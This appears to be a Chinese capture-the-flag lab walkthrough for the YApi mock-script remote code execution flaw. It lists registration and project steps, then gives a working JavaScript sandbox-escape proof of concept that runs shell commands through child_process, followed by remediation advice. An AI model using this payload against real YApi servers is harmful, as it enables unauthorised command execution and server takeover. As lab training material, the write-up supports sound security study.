漏洞介绍
名称: yapi 代码执行
描述: API接口管理平台是国内某旅行网站的大前端技术中心开源项目,使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。 YApi 是高效、易用、功能强大的 api 管理平台。但因为大量用户使用 YAPI的默认配置并允许从外部网络访问 YApi服务,导致攻击者注册用户后,即可通过 Mock功能远程执行任意代码。
解题过程
1.打开靶场页面,进入注册页面,随意注册一个用户
2.注册后进入如下页面
3.随意新建一个项目
4.随意添加一个接口
5.添加接口后如图所示
6.按图中所示依次点击
7.在脚本输入出输入poc,可以看出来ls /tmp所在的地方就是要执行的命令,如果要执行其他命令,修改ls /tmp即可。
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("ls /tmp && ps -ef").toString()
输入后点击保存
然后进入预览,点击预览地址
可以看到命令被成功执行,返回在预览页面上,获得flag
修复建议
1.关闭YAPI注册功能
2.删除恶意账户
3.回滚服务器快照
4.同步删除恶意mock脚本以防止二次攻击